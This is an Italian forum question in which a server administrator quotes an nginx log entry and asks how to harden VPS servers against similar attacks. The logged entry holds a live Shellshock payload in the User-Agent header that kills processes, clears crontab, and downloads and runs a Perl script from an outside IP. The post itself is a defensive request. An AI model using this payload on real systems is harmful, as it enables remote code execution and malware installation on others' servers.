Ho appena notato questa voce ripetuta nel registro nginx:
31.184.194.114 - - [04/Mar/2015:10:29:53 +0700] "GET /cgi-bin/up.cgi HTTP/1.1" 301 178 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22crontab -r;killall -9 php perl; cd /tmp/ ; mkdir gnu-bash-max-races ; cd /tmp/gnu-bash-max-races ; wget http://64.32.12.152/gnu-bash-max-race ; lwp-download http://64.32.12.152/gnu-bash-max-race ; fetch http://64.32.12.152/gnu-bash-max-race ; curl -O http://64.32.12.152/gnu-bash-max-race ; perl gnu-bash-max-race;cd /tmp/;rm -rf max*\x22);'"
Questo sta attaccando gitlab virtualhost, quindi non fa alcun danno. Anche io non ho cgi, io uso php-fpm per altri virtualhost.
Voglio sapere se c'è qualche contromisura che deve essere impostata sul server per difendersi da attacchi simili?
PS: ho già impostato i divieti IP usando iptables e fail2ban in esecuzione. Il mio altro vps è stato ripreso tramite ssh, quindi ho dovuto reinstallarlo di nuovo. Sono ancora in condizioni paranoiche e voglio irrigidire i server vps sotto il mio controllo.